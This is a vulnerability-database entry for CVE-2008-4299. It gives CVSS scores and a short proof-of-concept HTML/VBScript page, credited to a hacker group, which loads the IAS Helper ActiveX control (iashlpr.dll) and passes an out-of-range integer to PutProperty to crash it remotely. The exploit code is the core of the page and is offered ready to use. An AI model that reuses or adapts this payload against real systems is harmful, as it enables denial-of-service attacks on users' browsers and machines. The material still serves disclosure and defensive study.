Bug: IAS Helper COM Component (iashlpr.dll) activex remote DOS ( Ascii Version )

Search:
WLB2

IAS Helper COM Component (iashlpr.dll) activex remote DOS

Published
Credit
Risk
2008.10.01
hamedata gmail com
Medium
CWE
CVE
Local
Remote
CWE-189
CVE-2008-4299
No
Yes

CVSS Base Score
Impact Subscore
Exploitability Subscore
5/10
2.9/10
10/10
Exploit range
Attack complexity
Authentication
Remote
Low
No required
Confidentiality impact
Integrity impact
Availability impact
None
None
Partial



# Tilte: iashlpr.dll activex remote DOS

# Exp0iters member (order by alphabet) .........: [Ciph3r,Hamedeta,Rake,Sh3llh3ll,the_Edit0r]

# Author........................................: [hamedata]

# E-mail........................................: [hamedata (at) gmail (dot) com [email concealed]]

# Location .....................................: [Iran]

# Software .....................................: [IAS Helper COM Component]

# Sp Tanx2 .....................................: [ALL HACKERS]

# Vulnerability: Remote DOS Exploit

# Part Expl0it & Bug Codes :

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
=-=-=-=-=-=-=-=-=-=-

<html>

<object classid='clsid:6BC096BC-0CE6-11D1-BAAE-00C04FC2E20D' id='target' /></object>

<input language=VBScript onclick=try() type=button value='start'>

<script language='vbscript'>

Sub try

bad_data=-2147483647

secondarg="expl0iters"

target.PutProperty bad_data ,secondarg

End Sub

</script>

</html>

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
=-=-=-=-=-=-=-=-=-=-

# Part Contact :

Contact me : hamedata (at) gmail (dot) com [email concealed]

Contact Expl0iters team : the_3dit0r[at]Yahoo[dot]coM

References:

http://www.securityfocus.com/archive/1/archive/1/496695/100/0/threaded

See this note in TXT Version

Bugtraq RSS
Bugtraq
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn
 
CVE RSS
CVEMAP

Copyright 2014, cxsecurity.com
Ascii Version